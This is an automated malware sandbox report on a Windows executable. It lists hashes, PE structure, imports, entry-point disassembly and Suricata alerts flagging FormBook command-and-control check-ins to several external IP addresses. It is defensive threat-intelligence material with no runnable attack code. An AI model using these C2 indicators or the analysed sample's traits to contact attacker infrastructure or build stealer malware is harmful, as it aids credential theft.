                                                                                                      MD5:7DF87E0D88FDAD1D7F0B9A1110E5FC0F
                                                                                                      SHA1:29E42B73F2E176FB36510C749575F1D5F9CF6699
                                                                                                      SHA-256:B985C5F45ED6FB054009502CFB913164A82981AE7A07B71CEDD194375E78B29D
                                                                                                      SHA-512:62FCAB5836138AB7A5D6D7E76704F054DEEF07865A38AC44ADFBACBE8EED5A4E0C55C3CB960D25400E7C29888D55B4AE0E39231E3AEAA120894F6D1845FEF823
                                                                                                      Malicious:false
                                                                                                      Reputation:low
                                                                                                      Preview:x..a.F4HH..X...o.AN...c0[...HMGJQIH57SYAMY5PK3SF4HHMGJQIH5.SYACF.^K.Z...I..k.!!F.#+.*+T=kP2(Z'<m%/q;=[.:7a..fp&\7#.EEGcJQIH57S @D..0,.n&S.u- .K....3>.W...wS4....{*6..\T;d!*.5PK3SF4H..GJ.HI5...!MY5PK3SF.HJLLKZIHg3SYAMY5PK3#R4HH]GJQ9L57S.AMI5PK1SF2HHMGJQIN57SYAMY5 O3SD4HHMGJSI..7SIAMI5PK3CF4XHMGJQIX57SYAMY5PK3SF4HHMGJQIH57SYAMY5PK3SF4HHMGJQIH57SYAMY5PK3SF4HHMGJQIH57SYAMY5PK3SF4HHMGJQIH57SYAMY5PK3SF4HHMGJQIH57SYAMY5PK3SF4HHMGJQIfAR+-AMY1.O3SV4HH.CJQYH57SYAMY5PK3SF.HH-GJQIH57SYAMY5PK3SF4HHMGJQIH57SYAMY5PK3SF4HHMGJQIH57SYAMY5PK3SF4HHMGJQIH57SYAMY5PK3SF4HHMGJQIH57SYAMY5PK3SF4HHMGJQIH57SYAMY5PK3SF4HHMGJQIH57SYAMY5PK3SF4HHMGJQIH57SYAMY5PK3SF4HHMGJQIH57SYAMY5PK3SF4HHMGJQIH57SYAMY5PK3SF4HHMGJQIH57SYAMY5PK3SF4HHMGJQIH57SYAMY5PK3SF4HHMGJQIH57SYAMY5PK3SF4HHMGJQIH57SYAMY5PK3SF4HHMGJQIH57SYAMY5PK3SF4HHMGJQIH57SYAMY5PK3SF4HHMGJQIH57SYAMY5PK3SF4HHMGJQIH57SYAMY5PK3SF4HHMGJQIH57SYAMY5PK3SF4HHMGJQIH57SYAMY5PK3SF4HHMGJQIH57SYAMY5PK3SF4HHMGJQIH57SYAMY5PK3SF4HHMGJQIH57SYAMY5PK3SF4HHMGJQIH57SYAMY5PK3SF4HHM

                                                                                                      Static File Info

                                                                                                      General

                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                      Entropy (8bit):7.5623073767022575
                                                                                                      TrID:
                                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                      File name:Z6s208B9QX.exe
                                                                                                      File size:1'403'415 bytes
                                                                                                      MD5:09bfd7f979770cde56456734d6d1ff8d
                                                                                                      SHA1:15a1450424a5bf0320b429d7aaa71dc724502d89
                                                                                                      SHA256:e24039b0b5c049807d966f0215f595410392fd4bc65142f101dc3282b6f75aa5
                                                                                                      SHA512:2f2f95cf6ef102c4538ce6633ce2f3c3bfbbc1eb4f41fdb3391eda436ad3742f7701ffcff0614c4d6162b9a92d9b9905aaf467998c0aaefe00dbcf579afdd7df
                                                                                                      SSDEEP:24576:uRmJkcoQricOIQxiZY1iaCtC7Jv9zuKi8GfE1JTCtsri/c26MRxuQoO:7JZoQrbTFZY1iaCtCtsKgE18ZcoxubO
                                                                                                      TLSH:2155F122B5C68076C2F323B19E7AF769963D79360327D1D723C82D365EA05812B39763
                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................1b.......P.).....Q.......y.......i..........}....N.......d.......`.......m.......g.....Rich............PE..L..

                                                                                                      File Icon

                                                                                                      Icon Hash:1733312925935517

                                                                                                      Static PE Info

                                                                                                      General

                                                                                                      Entrypoint:0x4165c1
                                                                                                      Entrypoint Section:.text
                                                                                                      Digitally signed:false
                                                                                                      Imagebase:0x400000
                                                                                                      Subsystem:windows gui
                                                                                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                      DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                      Time Stamp:0x4F25BAEC [Sun Jan 29 21:32:28 2012 UTC]
                                                                                                      TLS Callbacks:
                                                                                                      CLR (.Net) Version:
                                                                                                      OS Version Major:5
                                                                                                      OS Version Minor:0
                                                                                                      File Version Major:5
                                                                                                      File Version Minor:0
                                                                                                      Subsystem Version Major:5
                                                                                                      Subsystem Version Minor:0
                                                                                                      Import Hash:d3bf8a7746a8d1ee8f6e5960c3f69378

                                                                                                      Entrypoint Preview

                                                                                                      Instruction
                                                                                                      call 00007F0D00CE31FBh
                                                                                                      jmp 00007F0D00CDA06Eh
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      push ebp
                                                                                                      mov ebp, esp
                                                                                                      push edi
                                                                                                      push esi
                                                                                                      mov esi, dword ptr [ebp+0Ch]
                                                                                                      mov ecx, dword ptr [ebp+10h]
                                                                                                      mov edi, dword ptr [ebp+08h]
                                                                                                      mov eax, ecx
                                                                                                      mov edx, ecx
                                                                                                      add eax, esi
                                                                                                      cmp edi, esi
                                                                                                      jbe 00007F0D00CDA1EAh
                                                                                                      cmp edi, eax
                                                                                                      jc 00007F0D00CDA386h
                                                                                                      cmp ecx, 00000080h
                                                                                                      jc 00007F0D00CDA1FEh
                                                                                                      cmp dword ptr [004A9724h], 00000000h
                                                                                                      je 00007F0D00CDA1F5h
                                                                                                      push edi
                                                                                                      push esi
                                                                                                      and edi, 0Fh
                                                                                                      and esi, 0Fh
                                                                                                      cmp edi, esi
                                                                                                      pop esi
                                                                                                      pop edi
                                                                                                      jne 00007F0D00CDA1E7h
                                                                                                      jmp 00007F0D00CDA5C2h
                                                                                                      test edi, 00000003h
                                                                                                      jne 00007F0D00CDA1F6h
                                                                                                      shr ecx, 02h
                                                                                                      and edx, 03h
                                                                                                      cmp ecx, 08h
                                                                                                      jc 00007F0D00CDA20Bh
                                                                                                      rep movsd
                                                                                                      jmp dword ptr [00416740h+edx*4]
                                                                                                      mov eax, edi
                                                                                                      mov edx, 00000003h
                                                                                                      sub ecx, 04h
                                                                                                      jc 00007F0D00CDA1EEh
                                                                                                      and eax, 03h
                                                                                                      add ecx, eax
                                                                                                      jmp dword ptr [00416654h+eax*4]
                                                                                                      jmp dword ptr [00416750h+ecx*4]
                                                                                                      nop
                                                                                                      jmp dword ptr [004166D4h+ecx*4]
                                                                                                      nop
                                                                                                      inc cx
                                                                                                      add byte ptr [eax-4BFFBE9Ah], dl
                                                                                                      inc cx
                                                                                                      add byte ptr [ebx], ah
                                                                                                      ror dword ptr [edx-75F877FAh], 1
                                                                                                      inc esi
                                                                                                      add dword ptr [eax+468A0147h], ecx
                                                                                                      add al, cl
                                                                                                      jmp 00007F0D031529E7h
                                                                                                      add esi, 03h
                                                                                                      add edi, 03h
                                                                                                      cmp ecx, 08h
                                                                                                      jc 00007F0D00CDA1AEh
                                                                                                      rep movsd
                                                                                                      jmp dword ptr [00000000h+edx*4]

                                                                                                      Rich Headers

                                                                                                      Programming Language:
                                                                                                      • [ C ] VS2010 SP1 build 40219
                                                                                                      • [C++] VS2010 SP1 build 40219
                                                                                                      • [ C ] VS2008 SP1 build 30729
                                                                                                      • [IMP] VS2008 SP1 build 30729
                                                                                                      • [ASM] VS2010 SP1 build 40219
                                                                                                      • [RES] VS2010 SP1 build 40219
                                                                                                      • [LNK] VS2010 SP1 build 40219

                                                                                                      Data Directories

                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x8d41c0x154.rdata
                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xab0000x9328.rsrc
                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x820000x844.rdata
                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                      Sections

                                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                      .text0x10000x8061c0x8080061ffce4768976fa0dd2a8f6a97b1417aFalse0.5583182605787937data6.684690148171278IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                      .rdata0x820000xdfc00xe0000354bc5f2376b5e9a4a3ba38b682dff1False0.36085728236607145data4.799741132252136IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                      .data0x900000x1a7580x68008033f5a38941b4685bc2299e78f31221False0.15324519230769232data2.1500715391677487IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                      .rsrc0xab0000x93280x9400495451d7eb8326bd9fa2714869ea6de8False0.49002322635135137data5.541804843154628IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                      Resources

                                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                      RT_ICON0xab5c80x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                                                      RT_ICON0xab6f00x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                                                      RT_ICON0xab8180x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                                                      RT_ICON0xab9400x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishGreat Britain0.48109756097560974
                                                                                                      RT_ICON0xabfa80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishGreat Britain0.5672043010752689
                                                                                                      RT_ICON0xac2900x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishGreat Britain0.6418918918918919
                                                                                                      RT_ICON0xac3b80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishGreat Britain0.7044243070362474
                                                                                                      RT_ICON0xad2600x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishGreat Britain0.8077617328519856
                                                                                                      RT_ICON0xadb080x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishGreat Britain0.5903179190751445
                                                                                                      RT_ICON0xae0700x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishGreat Britain0.5503112033195021
                                                                                                      RT_ICON0xb06180x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishGreat Britain0.6050656660412758
                                                                                                      RT_ICON0xb16c00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishGreat Britain0.7553191489361702
                                                                                                      RT_MENU0xb1b280x50dataEnglishGreat Britain0.9
                                                                                                      RT_DIALOG0xb1b780xfcdataEnglishGreat Britain0.6507936507936508
                                                                                                      RT_STRING0xb1c780x530dataEnglishGreat Britain0.33960843373493976
                                                                                                      RT_STRING0xb21a80x690dataEnglishGreat Britain0.26964285714285713
                                                                                                      RT_STRING0xb28380x4d0dataEnglishGreat Britain0.36363636363636365
                                                                                                      RT_STRING0xb2d080x5fcdataEnglishGreat Britain0.3087467362924282
                                                                                                      RT_STRING0xb33080x65cdataEnglishGreat Britain0.34336609336609336
                                                                                                      RT_STRING0xb39680x388dataEnglishGreat Britain0.377212389380531
                                                                                                      RT_STRING0xb3cf00x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishUnited States0.502906976744186
                                                                                                      RT_GROUP_ICON0xb3e480x84dataEnglishGreat Britain0.6439393939393939
                                                                                                      RT_GROUP_ICON0xb3ed00x14dataEnglishGreat Britain1.15
                                                                                                      RT_GROUP_ICON0xb3ee80x14dataEnglishGreat Britain1.25
                                                                                                      RT_GROUP_ICON0xb3f000x14dataEnglishGreat Britain1.25
                                                                                                      RT_VERSION0xb3f180x19cdataEnglishGreat Britain0.5339805825242718
                                                                                                      RT_MANIFEST0xb40b80x26cASCII text, with CRLF line terminatorsEnglishUnited States0.5145161290322581

                                                                                                      Imports

                                                                                                      DLLImport
                                                                                                      WSOCK32.dll__WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
                                                                                                      VERSION.dllVerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
                                                                                                      WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                                                      COMCTL32.dllImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
                                                                                                      MPR.dllWNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
                                                                                                      WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
                                                                                                      PSAPI.DLLEnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
                                                                                                      USERENV.dllCreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
                                                                                                      KERNEL32.dllHeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, InterlockedIncrement, InterlockedDecrement, WideCharToMultiByte, lstrcpyW, MultiByteToWideChar, lstrlenW, lstrcmpiW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, GetProcessHeap, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetLocalTime, CompareStringW, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetTimeFormatW, GetDateFormatW, GetCommandLineW, GetStartupInfoW, IsProcessorFeaturePresent, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStringTypeW, HeapCreate, SetHandleCount, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, RtlUnwind, SetFilePointer, GetTimeZoneInformation, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetTickCount, HeapReAlloc, WriteConsoleW, SetEndOfFile, SetSystemPowerState, SetEnvironmentVariableA
                                                                                                      USER32.dllGetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, SetWindowPos, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, TranslateMessage, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, GetMenuItemID, DispatchMessageW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, PeekMessageW, UnregisterHotKey, CharLowerBuffW, keybd_event, MonitorFromRect, GetWindowThreadProcessId
                                                                                                      GDI32.dllDeleteObject, AngleArc, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, GetDeviceCaps, MoveToEx, DeleteDC, GetPixel, CreateDCW, Ellipse, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, LineTo
                                                                                                      COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                                                      ADVAPI32.dllRegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, CloseServiceHandle, UnlockServiceDatabase, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, CopySid, LogonUserW, LockServiceDatabase, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, GetAce, AddAce, SetSecurityDescriptorDacl, RegOpenKeyExW, RegQueryValueExW, AdjustTokenPrivileges, InitiateSystemShutdownExW, OpenSCManagerW, RegCloseKey
                                                                                                      SHELL32.dllDragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                                                      ole32.dllOleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CLSIDFromString, StringFromGUID2, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, ProgIDFromCLSID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize, IIDFromString
                                                                                                      OLEAUT32.dllVariantChangeType, VariantCopyInd, DispCallFunc, CreateStdDispatch, CreateDispTypeInfo, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SysStringLen, SafeArrayAllocData, GetActiveObject, QueryPathOfRegTypeLib, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysAllocString, VariantCopy, VariantClear, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, SafeArrayAccessData, VariantInit

                                                                                                      Possible Origin

                                                                                                      Language of compilation systemCountry where language is spokenMap
                                                                                                      EnglishGreat Britain
                                                                                                      EnglishUnited States

                                                                                                      Network Behavior

                                                                                                      Suricata IDS Alerts

                                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                      2024-10-08T15:54:55.058220+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.11499813.33.130.19080TCP
                                                                                                      2024-10-08T15:55:11.208615+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.114998223.224.37.7680TCP
                                                                                                      2024-10-08T15:55:13.745510+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.114998323.224.37.7680TCP
                                                                                                      2024-10-08T15:55:16.324503+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.114998423.224.37.7680TCP
                                                                                                      2024-10-08T15:55:19.067831+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.114998523.224.37.7680TCP
                                                                                                      2024-10-08T15:55:25.356025+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.114998620.184.53.16280TCP
                                                                                                      2024-10-08T15:55:27.907328+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.114998720.184.53.16280TCP
                                                                                                      2024-10-08T15:55:31.024077+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.114998820.184.53.16280TCP
                                                                                                      2024-10-08T15:55:33.552417+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.114998920.184.53.16280TCP
                                                                                                      2024-10-08T15:55:39.615131+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1149990199.192.21.16980TCP
                                                                                                      2024-10-08T15:55:42.829677+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1149991199.192.21.16980TCP
                                                                                                      2024-10-08T15:55:45.444662+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1149992199.192.21.16980TCP
                                                                                                      2024-10-08T15:55:47.945936+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.1149993199.192.21.16980TCP
                                                                                                      2024-10-08T15:55:53.697059+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.114999481.2.196.1980TCP
                                                                                                      2024-10-08T15:55:56.268746+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.114999581.2.196.1980TCP
                                                                                                      2024-10-08T15:55:58.941631+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.114999681.2.196.1980TCP
                                                                                                      2024-10-08T15:56:01.506046+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.114999781.2.196.1980TCP
                                                                                                      2024-10-08T15:56:07.828208+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1149998107.163.130.24980TCP
                                                                                                      2024-10-08T15:56:10.342789+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1149999107.163.130.24980TCP
                                                                                                      2024-10-08T15:56:13.128271+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1150000107.163.130.24980TCP
                                                                                                      2024-10-08T15:56:15.481765+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.1150001107.163.130.24980TCP
                                                                                                      2024-10-08T15:56:30.980849+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1150002103.21.221.480TCP
                                                                                                      2024-10-08T15:56:33.258500+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1150003103.21.221.480TCP
                                                                                                      2024-10-08T15:56:35.789412+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1150004103.21.221.480TCP
                                                                                                      2024-10-08T15:56:38.340684+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.1150005103.21.221.480TCP
                                                                                                      2024-10-08T15:56:44.908726+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.11500063.33.130.19080TCP
                                                                                                      2024-10-08T15:56:46.407490+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.11500073.33.130.19080TCP
                                                                                                      2024-10-08T15:56:48.996607+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.11500083.33.130.19080TCP
                                                                                                      2024-10-08T15:56:51.500642+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.11500093.33.130.19080TCP
                                                                                                      2024-10-08T15:56:57.025799+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.11500103.33.130.19080TCP
                                                                                                      2024-10-08T15:57:00.480822+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.11500113.33.130.19080TCP
                                                                                                      2024-10-08T15:57:02.113014+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.11500123.33.130.19080TCP
                                                                                                      2024-10-08T15:57:04.975729+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.11500133.33.130.19080TCP
                                                                                                      2024-10-08T15:57:10.496832+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.115001415.197.204.5680TCP
                                                                                                      2024-10-08T15:57:13.035316+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.115001515.197.204.5680TCP
                                                                                                      2024-10-08T15:57:15.596242+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.115001615.197.204.5680TCP
                                                                                                      2024-10-08T15:57:18.137011+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.115001715.197.204.5680TCP
                                                                                                      2024-10-08T15:57:23.793559+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1150018198.252.106.19180TCP
                                                                                                      2024-10-08T15:57:26.356859+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1150019198.252.106.19180TCP
                                                                                                      2024-10-08T15:57:28.949746+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1150020198.252.106.19180TCP
                                                                                                      2024-10-08T15:57:31.437191+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.1150021198.252.106.19180TCP
                                                                                                      2024-10-08T15:57:38.673484+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.115002243.154.104.24780TCP
